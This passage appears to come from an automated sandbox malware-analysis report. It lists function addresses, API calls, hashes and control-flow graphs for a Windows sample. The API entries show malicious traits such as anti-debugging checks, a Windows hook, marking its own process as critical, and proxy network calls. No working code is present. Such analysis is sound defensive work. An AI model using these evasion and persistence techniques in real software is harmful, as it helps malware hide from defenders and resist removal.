                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task$ExceptionThrowmallocstd::bad_alloc::bad_alloc
                                  • String ID:
                                  • API String ID: 594857686-0
                                  • Opcode ID: 9b9b924148bc05b72d239458088072916151ad811da7a7a7414cdb37cb802451
                                  • Instruction ID: 98ba7bdde5c7759390ae29331b0cfa05770fcfb268a944be21448fbf5a2f8beb
                                  • Opcode Fuzzy Hash: 9b9b924148bc05b72d239458088072916151ad811da7a7a7414cdb37cb802451
                                  • Instruction Fuzzy Hash: 46E0E274E1B20705FD682AA21806CB462447F69BB0E182F30DA7DE92C2AD1CE4918360
                                  Function 00007FF6ACE84A20 Relevance: 4.5, APIs: 3, Instructions: 17COMMON
                                  Download Yara Rule
                                  APIs
                                  • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z.MSVCP140 ref: 00007FF6ACE84A35
                                  • ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z.MSVCP140 ref: 00007FF6ACE84A41
                                  • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF6ACE84A4A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
                                  • String ID:
                                  • API String ID: 1875450691-0
                                  • Opcode ID: 8d937d32ce33f06219499cb6ebe867d977766a1dd49917394ca6ae318040311d
                                  • Instruction ID: d4157d273a9f18ee8a596a5ccbf784c2c775c6facab5f9cfd2ef70fbf7ac7909
                                  • Opcode Fuzzy Hash: 8d937d32ce33f06219499cb6ebe867d977766a1dd49917394ca6ae318040311d
                                  • Instruction Fuzzy Hash: 49D05E22B85A06C2DF089F26B8945382320FF89F96B4CA031DE1F87310CE3CD09A8300
                                  Function 00007FF6ACE838E0 Relevance: 3.1, APIs: 2, Instructions: 63fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: fwritememcpy
                                  • String ID:
                                  • API String ID: 4173912309-0
                                  • Opcode ID: 267b3e36c413e1cd0c63ef0805f91c2eb958757640843b981dae354c8943ec88
                                  • Instruction ID: dc7f3d1a00853510529137135906c4f9eae867bf411d238188162d388a63f503
                                  • Opcode Fuzzy Hash: 267b3e36c413e1cd0c63ef0805f91c2eb958757640843b981dae354c8943ec88
                                  • Instruction Fuzzy Hash: 2511B432B06A4586EA158F9E9450A7977A0FB84FC4F2C1035EF4CA7B55DF3DD4928300
                                  Function 00007FF6ACE84730 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF6ACE822C3), ref: 00007FF6ACE84790
                                  • ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140(?,?,?,00007FF6ACE822C3), ref: 00007FF6ACE847B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: D@std@@@std@@Init@?$basic_streambuf@U?$char_traits@fclose
                                  • String ID:
                                  • API String ID: 356833432-0
                                  • Opcode ID: 683fd20ffac98a6d001e8d3efdd7ffe3bf1fe8affbf5983a4d5ad129342566a1
                                  • Instruction ID: 37a795b8959fd50b619a07b0cb34666d6e9baa7c4fc7829b3e473c74527e5b9c
                                  • Opcode Fuzzy Hash: 683fd20ffac98a6d001e8d3efdd7ffe3bf1fe8affbf5983a4d5ad129342566a1
                                  • Instruction Fuzzy Hash: 6511BF36A09B80C1EB448F6AE69432937E4FB89B84F044031DB4D97B60CF39D46AC740

                                  Non-executed Functions

                                  Function 00007FF6ACE863D8 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                  • String ID:
                                  • API String ID: 313767242-0
                                  • Opcode ID: b5b9191020113a853293da362aca06a9e83f20045b3b06fb7f443ed2dd9af6f3
                                  • Instruction ID: 8acf3a8138176fda5971a8c913300889bc69a681c80dff8400657c05efbbd6ed
                                  • Opcode Fuzzy Hash: b5b9191020113a853293da362aca06a9e83f20045b3b06fb7f443ed2dd9af6f3
                                  • Instruction Fuzzy Hash: 03312D76709B8186EB608F60E890BED7364FB84744F44443ADA4EA7B98DF38D548C710
                                  Function 00007FF6ACE862B4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: c2296234de4a2b13368397028495990b08de0f3263ba1c20055b350d41b9d78f
                                  • Instruction ID: 67206bc991d50560a74ae3099476b8eb9acc3cefcf3f7ad77c788f1f7c6fcb89
                                  • Opcode Fuzzy Hash: c2296234de4a2b13368397028495990b08de0f3263ba1c20055b350d41b9d78f
                                  • Instruction Fuzzy Hash: 80111836B15B058AEB008B60EC546A833A4FB59758F440A31EA6DA67A4EF78D5588340
                                  Function 00007FF6ACE8657C Relevance: .0, Instructions: 2COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d73cbd7d299344ff5cd7b192302e61a3c3c01d54c6943bf4da688f4da652d51
                                  • Instruction ID: 8f848d68a9330641c0e1f4834b9b78eb3ee80b470cc71cbec1cabeff8c7142a9
                                  • Opcode Fuzzy Hash: 7d73cbd7d299344ff5cd7b192302e61a3c3c01d54c6943bf4da688f4da652d51
                                  • Instruction Fuzzy Hash: 01A00235A4ED06D0E6048B00F870E313334FB60300F504431D01DF25A49F3DE400D700
                                  Function 00007FF6ACE852C0 Relevance: 16.8, APIs: 11, Instructions: 314COMMON
                                  Download Yara Rule
                                  APIs
                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF6ACE8566F), ref: 00007FF6ACE8533E
                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6ACE8566F), ref: 00007FF6ACE85431
                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF6ACE8566F), ref: 00007FF6ACE8546E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn$memcpy
                                  • String ID:
                                  • API String ID: 3063020102-0
                                  • Opcode ID: 6e1ca49ac21e01fb0ffb537636f145ac82d4b5a7d424c77c0f551e05aa750570
                                  • Instruction ID: 8a8e489c7f485421f2f3c5b0cdbe1b29bdb3aa187c9232636de18df71bafd98d
                                  • Opcode Fuzzy Hash: 6e1ca49ac21e01fb0ffb537636f145ac82d4b5a7d424c77c0f551e05aa750570
                                  • Instruction Fuzzy Hash: 88B1BD72B0BA8581FE249F26A54476D73A2FB04FD4F584231DB6D9BB89DE7CD4918300
                                  Function 00007FF6ACE83B00 Relevance: 10.7, APIs: 7, Instructions: 178COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: fgetc
                                  • String ID:
                                  • API String ID: 2807381905-0
                                  • Opcode ID: e117d0d938a6ee3e3ecf459bccf3cfd29baf76d293f3edeb3e89dc77dd99eea3
                                  • Instruction ID: 42cad988b75f2ce0d5feb7f5592025ef24510379a34055db05c7fa106bded620
                                  • Opcode Fuzzy Hash: e117d0d938a6ee3e3ecf459bccf3cfd29baf76d293f3edeb3e89dc77dd99eea3
                                  • Instruction Fuzzy Hash: 43917B32B19A81C9EB108F69D4906AC37B4FB48B68F544636DE6DA7B94DF38D494C300
                                  Function 00007FF6ACE851B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
                                  • String ID:
                                  • API String ID: 762505753-0
                                  • Opcode ID: 1a1b6a1305f1ec832787b82b9647c48760f953531d89ea964aabc19d7725c369
                                  • Instruction ID: 6bd0d46206a07dfce2f94cac9b7c98c067fd2e015ac6b3e7cef2af767990f100
                                  • Opcode Fuzzy Hash: 1a1b6a1305f1ec832787b82b9647c48760f953531d89ea964aabc19d7725c369
                                  • Instruction Fuzzy Hash: A6314D32A0AB41C5FF149F51E88056A7370FB98B94F480631EA9EA7BA9DF3CE454C700
                                  Function 00007FF6ACE82CA4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Internet$CloseHandle$Open_invalid_parameter_noinfo_noreturnmemcpy$FolderHttpInfoPathQuery
                                  • String ID: Mozilla/5.0$[-] proxy 2 fail
                                  • API String ID: 1057685838-958313571
                                  • Opcode ID: f121a173f4eb18268ceca57d2afda518c6de55dcc6c7384fbcf7b9e1dc934fff
                                  • Instruction ID: 4125a2b3c6b458f3eef4c97593aaa99c691e9b486db337ff31a4f1675928ac66
                                  • Opcode Fuzzy Hash: f121a173f4eb18268ceca57d2afda518c6de55dcc6c7384fbcf7b9e1dc934fff
                                  • Instruction Fuzzy Hash: 37219D72B0A6C2C5FB308B24A894BA932A0FF14798F404231EA5DABBD8DF3CD5459314
                                  Function 00007FF6ACE84410 Relevance: 7.6, APIs: 5, Instructions: 120COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: memcpy$??1?$basic_streambuf@Concurrency::cancel_current_taskD@std@@@std@@U?$char_traits@_invalid_parameter_noinfo_noreturnmalloc
                                  • String ID:
                                  • API String ID: 4201898570-0
                                  • Opcode ID: 67b3f95c3ee054f7238ebf52c9aaae056340cb7867f704724b21ac6d1837647c
                                  • Instruction ID: ba983533962e7ac68213cfccc7188dc2d632947280916b18d9980ba096b4c733
                                  • Opcode Fuzzy Hash: 67b3f95c3ee054f7238ebf52c9aaae056340cb7867f704724b21ac6d1837647c
                                  • Instruction Fuzzy Hash: 2141F332A0AB8684EB249F65E4507AD33A4FB44FA4F580231DB6DA77D2DE3CD492C340
                                  Function 00007FF6ACE81370 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00007FF6ACE85AF8: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6ACE813B3), ref: 00007FF6ACE85B12
                                    • Part of subcall function 00007FF6ACE85AF8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6ACE85B28
                                    • Part of subcall function 00007FF6ACE85AF8: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6ACE85B2E
                                  • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF6ACE81478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task$mallocrand
                                  • String ID: 456789$>$?$gift/
                                  • API String ID: 2834162810-2149969741
                                  • Opcode ID: 8c57c224103aa00cf4bf45cd0fca84e0de12a80709d8e51393dd6c26426420e6
                                  • Instruction ID: 541b5b8e1ba2999728da8a9b784299f36b9b1e05b72e00d86a771e3de45f8d91
                                  • Opcode Fuzzy Hash: 8c57c224103aa00cf4bf45cd0fca84e0de12a80709d8e51393dd6c26426420e6
                                  • Instruction Fuzzy Hash: 1441A132A1AB85C6E700CF29E88076977A0FB99B84F545235EA8D93756DF7CE181C740
                                  Function 00007FF6ACE86EF8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: __current_exception__current_exception_contextterminate
                                  • String ID: csm
                                  • API String ID: 2542180945-1018135373
                                  • Opcode ID: edf0eb6e16020d90fbcbd95bbb2420476455b66a082028b9e67859aa44f8f5f8
                                  • Instruction ID: 0b4b4997d29fe46e0d0d50e04545d6de24d48dd06f263aa85d5a985a7c8656ba
                                  • Opcode Fuzzy Hash: edf0eb6e16020d90fbcbd95bbb2420476455b66a082028b9e67859aa44f8f5f8
                                  • Instruction Fuzzy Hash: 07F0F43B60AB85CAC7149F21E8919AC3768F78CB98F496130FA8D97B55CF38D8908700
                                  Function 00007FF6ACE83F40 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c78ae34ec28bf3ebda3800ebf123901912cfc5e1f5589ed62e8da6251769cb43
                                  • Instruction ID: b28f2f06b8f472ceb82b84df321e2d4fbcf6922bdd85433923e9bbe7711a71bd
                                  • Opcode Fuzzy Hash: c78ae34ec28bf3ebda3800ebf123901912cfc5e1f5589ed62e8da6251769cb43
                                  • Instruction Fuzzy Hash: 7B518F32709B82C5DB108F68E4507AEB7A0FB84B94F544236EA9D977A8EF7CC448C701
                                  Function 00007FF6ACE842F0 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2910658754.00007FF6ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ACE80000, based on PE: true
                                  • Associated: 00000000.00000002.2910610255.00007FF6ACE80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910707610.00007FF6ACE87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910756557.00007FF6ACE8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2910788949.00007FF6ACE8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff6ace80000_80BvHOM51j.jbxd
                                  Similarity
                                  • API ID: memset$Concurrency::cancel_current_task
                                  • String ID:
                                  • API String ID: 3006004123-0
                                  • Opcode ID: e5dd1f8391d494b9ae2707580d8f0eefd2baee3561a688cd81735adb57ffa14d
                                  • Instruction ID: 734483ef5fdc93c2748ccab0254d48f5012d7a2d5257f7468921bba8f5fb5853
                                  • Opcode Fuzzy Hash: e5dd1f8391d494b9ae2707580d8f0eefd2baee3561a688cd81735adb57ffa14d
                                  • Instruction Fuzzy Hash: F521E332A06B8285FA149B65A1507AD3294FF44BE4F244B30DB6C677D2DE7CE5918340

                                  Execution Graph

                                  Execution Coverage:25.4%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:21.4%
                                  Total number of Nodes:14
                                  Total number of Limit Nodes:1

                                  Executed Functions

                                  Function 00007FFD9BAA76EA Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2934430956.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID: CheckDebuggerPresentRemote
                                  • String ID:
                                  • API String ID: 3662101638-0
                                  • Opcode ID: 010f71a0800be35a7bf5222b364b8425164bf5b63b27e7d666aaf782c8786a5e
                                  • Instruction ID: 4f9fa9975bec6cd23a84eddf3443acb48ca4add1659b2cb75e763097edf6e593
                                  • Opcode Fuzzy Hash: 010f71a0800be35a7bf5222b364b8425164bf5b63b27e7d666aaf782c8786a5e
                                  • Instruction Fuzzy Hash: 5F514630A0D68C8FDB55EFA8C8456EABFF0FF15310F0502AAD459C71A2DB74A945CB91
                                  Function 00007FFD9BAAA2A1 Relevance: 1.8, APIs: 1, Instructions: 263COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 200 7ffd9baaa2a1-7ffd9baaa2a5 201 7ffd9baaa2a7-7ffd9baaa2a8 200->201 202 7ffd9baaa2aa-7ffd9baaa2b9 200->202 201->202 203 7ffd9baaa2bb 202->203 204 7ffd9baaa2bc-7ffd9baaa328 202->204 203->204 208 7ffd9baaa32a-7ffd9baaa32f 204->208 209 7ffd9baaa332-7ffd9baaa364 204->209 208->209 211 7ffd9baaa366 209->211 212 7ffd9baaa36c-7ffd9baaa39f 209->212 211->212 214 7ffd9baaa3aa-7ffd9baaa41d 212->214 215 7ffd9baaa3a1-7ffd9baaa3a9 212->215 219 7ffd9baaa4a9-7ffd9baaa4ad 214->219 220 7ffd9baaa423-7ffd9baaa430 214->220 215->214 221 7ffd9baaa432-7ffd9baaa46f SetWindowsHookExW 219->221 220->221 222 7ffd9baaa477-7ffd9baaa4a8 221->222 223 7ffd9baaa471 221->223 223->222
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2934430956.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID: HookWindows
                                  • String ID:
                                  • API String ID: 2559412058-0
                                  • Opcode ID: 5ccaf23a09a1402027c23096190893f1d6514c22ec5537f418f4755c0362bbc3
                                  • Instruction ID: 6e1246a72d37c0b16e3b91314b29b707d49eb33d072e9b6a2fe09c4095c115ed
                                  • Opcode Fuzzy Hash: 5ccaf23a09a1402027c23096190893f1d6514c22ec5537f418f4755c0362bbc3
                                  • Instruction Fuzzy Hash: 82711731A0CA4C4FDB59DB68D8566F9BBE1EF59321F00427FD009C31A2CB756806CB91
                                  Function 00007FFD9BAA9D6D Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 350 7ffd9baa9d6d-7ffd9baa9f30 call 7ffd9baa9458 RtlSetProcessIsCritical 367 7ffd9baa9f38-7ffd9baa9f6d 350->367 368 7ffd9baa9f32 350->368 368->367
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.2934430956.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_7ffd9baa0000_coonfart.jbxd
                                  Similarity
                                  • API ID: CriticalProcess
                                  • String ID:
                                  • API String ID: 2695349919-0
                                  • Opcode ID: b210ca9005b22724c511572e8c03dbe10301a78584f17e5f5be0f827ab549159
